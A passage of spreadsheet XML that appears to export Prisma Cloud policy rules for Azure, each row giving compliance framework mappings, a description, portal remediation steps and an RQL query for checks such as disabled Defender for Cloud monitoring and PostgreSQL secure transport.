          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) policies which have system updates monitoring set to disabled. It retrieves a daily list of available security and critical updates from Windows Update or Windows Server Update Services. The retrieved list depends on the service that's configured for that virtual machine and recommends that the missing updates be applied. For Linux systems, the policy uses the distro-provided package management system to determine packages that have available updates. It also checks for security and critical updates from Azure Cloud Services virtual machines.</t>
        </is>
      </c>
      <c r="X2365" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Choose the reported subscription
5. Click on the 'Security policy' under 'Policy settings' section
6. Click on 'SecurityCenterBuiltIn'
7. Select 'Parameters' tab
8. Set the 'System updates should be installed on your machines' to 'AuditIfNotExists'
9. If no other changes required then Click on 'Review + save'</t>
        </is>
      </c>
      <c r="Y2365"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5" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-policy-assignments' AND json.rule = '((name == SecurityCenterBuiltIn and properties.parameters.systemUpdatesMonitoringEffect.value equals Disabled) or (name == SecurityCenterBuiltIn and properties.parameters[*] is empty and properties.displayName does not start with "ASC Default"))'</t>
        </is>
      </c>
      <c r="AA2365" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2365" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2365" t="inlineStr">
        <is>
          <t>PC-AZR-PCY-111</t>
        </is>
      </c>
      <c r="AD2365" t="b">
        <v>1</v>
      </c>
      <c r="AE2365" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2365" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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5" t="inlineStr">
        <is>
          <t>57ed6965-ea15-46dc-9a8a-56140ffffc29</t>
        </is>
      </c>
      <c r="AI2365" t="inlineStr">
        <is>
          <t>e4afab31-dc49-446d-b424-d67c836fd7ce</t>
        </is>
      </c>
      <c r="AJ2365" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2365" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2366">
      <c r="A2366" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), NIST 800-53 Rev4, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, CSA CCM v3.0.1, NIST CSF, NIST SP 800-172, HITRUST CSF v9.3 [Deprecated], ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, kfirdaus AWS Account-CS, Fedramp (Moderate), Microsoft Cloud Security Benchmark v1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Telecommunications Security Act - TSA, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, TX-RAMP Level 1, MLPS 2.0 (Level 2), testazure, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), ISO 27001:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, MLPS 2.0 (Level 2), CyberSecurity Law of the People's Republic of China, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, NYDFS 23 CRR-NY 500.0, PCI DSS v3.2.1, CyberSecurity Law of the People's Republic of China, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, NIST 800-53 Rev 5, ISO 27001:2013, ITSG-33, Brazilian Data Protection Law (LGPD), TX-RAMP Level 1, ISO 27001:2013, ACSC Information Security Manual (ISM), kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO 27001:2013, NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v1.1 (Azure), APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, HITRUST v.9.4.2 [Deprecated], PIPEDA, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO 27001:2013, CIS Controls v8.1, CCPA 2018, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, CyberSecurity Law of the People's Republic of China, Copy of ACSC Information Security Manual (ISM)-clone, CDC NIST 800-53 Rev4, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, NIST 800-53 Rev4, TX-RAMP Level 2, MLPS 2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2366" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2366" s="2" t="inlineStr"/>
      <c r="D2366" t="inlineStr"/>
      <c r="E2366" t="inlineStr"/>
      <c r="F2366" t="inlineStr"/>
      <c r="G2366" t="b">
        <v>1</v>
      </c>
      <c r="H23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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2366" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="K2366" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud adaptive application controls monitoring is set to disabled</t>
        </is>
      </c>
      <c r="L2366" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2366" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2366" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2366" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2366" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2366" t="inlineStr">
        <is>
          <t>IA-1</t>
        </is>
      </c>
      <c r="R2366" t="inlineStr">
        <is>
          <t>IA-10</t>
        </is>
      </c>
      <c r="S2366" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2366" t="b">
        <v>1</v>
      </c>
      <c r="U2366" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2366" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="W2366" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) policies which have adaptive application controls monitoring set to disabled. Adaptive Application Controls will make sure that only certain applications can run on your VMs in Microsoft Azure. This will prevent any malicious, unwanted, or unsupported software on the VMs.</t>
        </is>
      </c>
      <c r="X2366" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Choose the reported subscription
5. Click on the 'Security policy' under 'Policy settings' section
6. Click on 'SecurityCenterBuiltIn'
7. Select 'Parameters' tab
8. Set the 'Adaptive application controls for defining safe applications should be enabled on your machines' to 'AuditIfNotExists'
9. If no other changes required then Click on 'Review + save'</t>
        </is>
      </c>
      <c r="Y2366"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6" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-policy-assignments' AND json.rule = '((name == SecurityCenterBuiltIn and properties.parameters.adaptiveApplicationControlsMonitoringEffect.value equals Disabled) or (name == SecurityCenterBuiltIn and properties.parameters[*] is empty and properties.displayName does not start with "ASC Default"))'</t>
        </is>
      </c>
      <c r="AA2366" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2366" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2366" t="inlineStr">
        <is>
          <t>PC-AZR-PCY-126</t>
        </is>
      </c>
      <c r="AD2366" t="b">
        <v>1</v>
      </c>
      <c r="AE2366" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2366" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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6" t="inlineStr">
        <is>
          <t>7363990f-b1fb-42c8-ad4a-fbb06de0310d</t>
        </is>
      </c>
      <c r="AI2366" t="inlineStr">
        <is>
          <t>3bbd79e6-5b80-4a25-b419-d7689d3615bd</t>
        </is>
      </c>
      <c r="AJ2366" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2366" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2367">
      <c r="A2367" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, ISO/IEC 27017:2015, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, Copy of ACSC Information Security Manual (ISM)-clone, kfirdaus AWS Account-CS, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev4, ISO 27001:2013, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, TX-RAMP Level 1, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CIS Controls v8, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST CSF, ISO 27001:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CIS v1.1 (Azure), Insurance Regulatory And Development Authority Of India, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, NYDFS 23 CRR-NY 500.0, CDC NIST 800-53 Rev4, PCI DSS v3.2.1, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST 800-53 Rev 5, ISO/IEC 27017:2015, ISO 27001:2013, ITSG-33, Brazilian Data Protection Law (LGPD), Fedramp (Moderate), CSA CCM v.4.0.1, ISO/IEC 27002:2013, TX-RAMP Level 1, New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, ISO/IEC 27002:2013, testazure, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO 27001:2013, NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, PIPEDA, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, NIST 800-53 Rev 5, CIS Controls v8.1, CIS Controls v8.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, CCPA 2018, Secure Controls Framework (SCF) - 2022.2.1, CyberSecurity Law of the People's Republic of China, Copy of ACSC Information Security Manual (ISM)-clone, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, TX-RAMP Level 2, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, PCI DSS v3.2.1</t>
        </is>
      </c>
      <c r="B2367" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2367" s="2" t="inlineStr"/>
      <c r="D2367" t="inlineStr"/>
      <c r="E2367" t="inlineStr"/>
      <c r="F2367" t="inlineStr"/>
      <c r="G2367" t="b">
        <v>1</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2367" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="K2367" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud JIT network access monitoring is set to disabled</t>
        </is>
      </c>
      <c r="L2367" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2367" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2367" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2367" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2367" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2367" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2367" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2367" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2367" t="b">
        <v>1</v>
      </c>
      <c r="U2367" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2367" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="W2367" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) policies which have JIT network access monitoring set to disabled. Enabling JIT Network Access will enhance the protection of VMs by creating a Just in Time VM. The JIT VM with NSG rule will restrict the availability of access to the ports to connect to the VM for a pre-set time and only after checking the Role Based Access Control permissions of the user. This feature will control the brute force attacks on the VMs.</t>
        </is>
      </c>
      <c r="X2367" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Choose the reported subscription
5. Click on the 'Security policy' under 'Policy settings' section
6. Click on 'SecurityCenterBuiltIn'
7. Select 'Parameters' tab
8. Set the 'Management ports of virtual machines should be protected with just-in-time network access control' to 'AuditIfNotExists'
9. If no other changes required then Click on 'Review + save'</t>
        </is>
      </c>
      <c r="Y2367"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7" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-policy-assignments' AND json.rule = '((name == SecurityCenterBuiltIn and properties.parameters.jitNetworkAccessMonitoringEffect.value equals Disabled) or (name == SecurityCenterBuiltIn and properties.parameters[*] is empty and properties.displayName does not start with "ASC Default"))'</t>
        </is>
      </c>
      <c r="AA2367" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2367" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2367" t="inlineStr">
        <is>
          <t>PC-AZR-PCY-120</t>
        </is>
      </c>
      <c r="AD2367" t="b">
        <v>1</v>
      </c>
      <c r="AE2367" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2367" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>2436e2a8-95e6-44b7-a4ce-3f95e1a589e4</t>
        </is>
      </c>
      <c r="AI2367" t="inlineStr">
        <is>
          <t>e2829c45-f3ec-4689-bf1f-85448e66171c</t>
        </is>
      </c>
      <c r="AJ2367" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2367" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2368">
      <c r="A2368" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, Brazilian Data Protection Law (LGPD), GDPR, APRA (CPS 234) Information Security, CIS v1.1 (Azure), GDPR, CSA CCM v3.0.1, ISO/IEC 27001:2022, NIST SP 800-172, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, APRA (CPS 234) Information Security, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Fedramp (Moderate), NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, Fedramp (Low), HITRUST CSF v9.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 1, NIST 800-53 Rev4, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, NIST 800-53 Rev 5, CIS Controls v8, NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, ISO 27001:2013, SOC 2, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NIST SP 800-171 Revision 3, MLPS 2.0 (Level 2), NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v3.0.1, DORA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev4, NIST 800-53 Rev 5, NIST 800-53 Rev 5, ITSG-33, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, TX-RAMP Level 1, New Zealand Information Security Manual (NZISM v3.4), Microsoft Cloud Security Benchmark v1, HITRUST CSF v9.3 [Deprecated], CSA CCM v3.0.1, APRA (CPS 234) Information Security, NIST CSF, NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PIPEDA, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, GDPR, TX-RAMP Level 2, HIPAA, HITRUST CSF v9.3 [Deprecated], CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CCPA 2018, CSA CCM v4.0.12, Fedramp (Moderate), CSA CCM v3.0.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, TX-RAMP Level 2, HITRUST CSF v9.3 [Deprecated], MLPS 2.0 (Level 2), PCI DSS v3.2.1, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2368" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2368" s="2" t="inlineStr"/>
      <c r="D2368" t="inlineStr"/>
      <c r="E2368" t="inlineStr"/>
      <c r="F2368" t="inlineStr"/>
      <c r="G2368" t="b">
        <v>1</v>
      </c>
      <c r="H23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68" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2368" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="K2368" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud disk encryption monitoring is set to disabled</t>
        </is>
      </c>
      <c r="L2368" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2368" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2368" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2368" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2368" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2368" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R2368" t="inlineStr">
        <is>
          <t>Control Reference:01.j</t>
        </is>
      </c>
      <c r="S2368" t="inlineStr">
        <is>
          <t>Security_Center</t>
        </is>
      </c>
      <c r="T2368" t="b">
        <v>1</v>
      </c>
      <c r="U2368" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2368" t="inlineStr">
        <is>
          <t>azure-policy-assignments</t>
        </is>
      </c>
      <c r="W2368" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) policies which have disk encryption monitoring set to disabled. Enabling disk encryption for virtual machines will secure the data by encrypting it. It is recommended to set disk encryption monitoring in Microsoft Defender for Cloud security policy.</t>
        </is>
      </c>
      <c r="X2368" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Choose the reported subscription
5. Click on the 'Security policy' under 'Policy settings' section
6. Click on 'SecurityCenterBuiltIn'
7. Select 'Parameters' tab
8. Set the 'Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources' to 'AuditIfNotExists'
9. If no other changes required then Click on 'Review + save'</t>
        </is>
      </c>
      <c r="Y2368" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Authorization/policyAssignments/*' permission. Successful execution will set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'impact': "sets system updates,
security configuration,
endpoint protection,
disk encryption,
network security groups,
web application firewall,
next generation firewall,
vulnerability assessment,
storage encryption,
jit network access,
adaptive application controls,
sql auditing and sql encryption to 'AuditIfNotExists'",
'cliScriptTemplate': 'az policy assignment create --scope $azureScope --name SecurityCenterBuiltIn --policy-set-definition 1f3afdf9-d0c9-4c3d-847f-89da613e70a8 -p \'"systemUpdatesMonitoringEffect":"value":"AuditIfNotExists","systemConfigurationsMonitoringEffect":"value":"AuditIfNotExists","endpointProtectionMonitoringEffect":"value":"AuditIfNotExists","diskEncryptionMonitoringEffect":"value":"AuditIfNotExists","networkSecurityGroupsMonitoringEffect":"value":"AuditIfNotExists","webApplicationFirewallMonitoringEffect":"value":"AuditIfNotExists","nextGenerationFirewallMonitoringEffect":"value":"AuditIfNotExists","vulnerabilityAssesmentMonitoringEffect":"value":"AuditIfNotExists","storageEncryptionMonitoringEffect":"value":"Audit","jitNetworkAccessMonitoringEffect":"value":"AuditIfNotExists","adaptiveApplicationControlsMonitoringEffect":"value":"AuditIfNotExists","sqlAuditingMonitoringEffect":"value":"AuditIfNotExists","sqlEncryptionMonitoringEffect":"value":"AuditIfNotExists"\''</t>
        </is>
      </c>
      <c r="Z2368" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-policy-assignments' AND json.rule = '((name == SecurityCenterBuiltIn and properties.parameters.diskEncryptionMonitoringEffect.value equals Disabled) or (name == SecurityCenterBuiltIn and properties.parameters[*] is empty and properties.displayName does not start with "ASC Default"))'</t>
        </is>
      </c>
      <c r="AA2368" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2368" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2368" t="inlineStr">
        <is>
          <t>PC-AZR-PCY-114</t>
        </is>
      </c>
      <c r="AD2368" t="b">
        <v>1</v>
      </c>
      <c r="AE2368" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2368" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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68" t="inlineStr">
        <is>
          <t>894e9b34-082b-4c24-ac6f-bdbf44e57ac7</t>
        </is>
      </c>
      <c r="AI2368" t="inlineStr">
        <is>
          <t>9580336a-3186-4958-ad6c-752545d128e9</t>
        </is>
      </c>
      <c r="AJ2368" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2368" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2369">
      <c r="A2369" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5, TX-RAMP Level 1, Microsoft Cloud Security Benchmark v1, ITSG-33, NYDFS 23 CRR-NY 500.0, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B2369" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2369" s="2" t="inlineStr"/>
      <c r="D2369" t="inlineStr"/>
      <c r="E2369" t="inlineStr"/>
      <c r="F2369" t="inlineStr"/>
      <c r="G2369" t="b">
        <v>1</v>
      </c>
      <c r="H23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69" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2369" t="inlineStr">
        <is>
          <t>azure-postgresql-flexible</t>
        </is>
      </c>
      <c r="K2369" t="inlineStr">
        <is>
          <t>Azure PostgreSQL flexible server secure transport parameter is disabled</t>
        </is>
      </c>
      <c r="L2369" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2369" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2369" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2369" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2369" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2369" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2369" t="inlineStr">
        <is>
          <t>SC-07-05 : Boundary Protection | Deny by Default — Allow by Exception</t>
        </is>
      </c>
      <c r="S2369" t="inlineStr"/>
      <c r="T2369" t="b">
        <v>0</v>
      </c>
      <c r="U2369" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2369" t="inlineStr">
        <is>
          <t>azure-postgresql-flexible-server</t>
        </is>
      </c>
      <c r="W2369" t="inlineStr">
        <is>
          <t>This policy identifies PostgreSQL flexible servers for which secure transport (SSL connectivity) parameter is disabled.
Secure transport (SSL connectivity) helps to provide a new layer of security, by connecting server to client applications using Secure Sockets Layer (SSL). Enforcing SSL connections between server and client applications helps protect against 'man in the middle' attacks by encrypting the data stream between the server and application.
As a security best practice, it is recommended to enable secure transport parameter for Azure PostgreSQL flexible server.</t>
        </is>
      </c>
      <c r="X2369" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal
2. Navigate to 'Azure Database for PostgreSQL flexible server'
3. Click on the reported PostgreSQL flexible server
4. Navigate to Settings -&gt; Server parameters
5. Search for parameter 'require_secure_transport' and set VALUE to 'ON' and You can also set min TLS version by setting 'ssl_min_protocol_version' server parameter as per your business requirement.
6. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2369" t="inlineStr"/>
      <c r="Z2369" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-postgresql-flexible-server' AND json.rule = properties.state equal ignore case Ready and require_secure_transport.value does not equal ignore case on</t>
        </is>
      </c>
      <c r="AA2369" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2369" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2369" t="inlineStr">
        <is>
          <t>PC-AZR-PG-759</t>
        </is>
      </c>
      <c r="AD2369" t="b">
        <v>1</v>
      </c>
      <c r="AE2369" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2369" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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69" t="inlineStr">
        <is>
          <t>1a7df747-1dac-4db7-b1c3-4d37c1e71a67</t>
        </is>
      </c>
      <c r="AI2369" t="inlineStr">
        <is>
          <t>d2cb3ada-3e83-465d-8c8e-9d7f6db46998</t>
        </is>
      </c>
      <c r="AJ2369" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2369" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2370">
      <c r="A2370" t="inlineStr">
        <is>
          <t>ISO/IEC 27001:2022, HIPAA, ISO/IEC 27001:2022, NIST 800-53 Rev 5, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, Insurance Regulatory And Development Authority Of India, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), SOC 2, SOC 2, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2370" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2370" s="2" t="inlineStr"/>
      <c r="D2370" t="inlineStr"/>
      <c r="E2370" t="inlineStr"/>
      <c r="F2370" t="inlineStr"/>
      <c r="G2370" t="b">
        <v>1</v>
      </c>
      <c r="H23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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2370" t="inlineStr">
        <is>
          <t>azure-postgresql-flexible</t>
        </is>
      </c>
      <c r="K2370" t="inlineStr">
        <is>
          <t>Azure PostgreSQL database flexible server configured with overly permissive network access</t>
        </is>
      </c>
      <c r="L2370" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2370" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2370" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2370" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2370" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2370" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
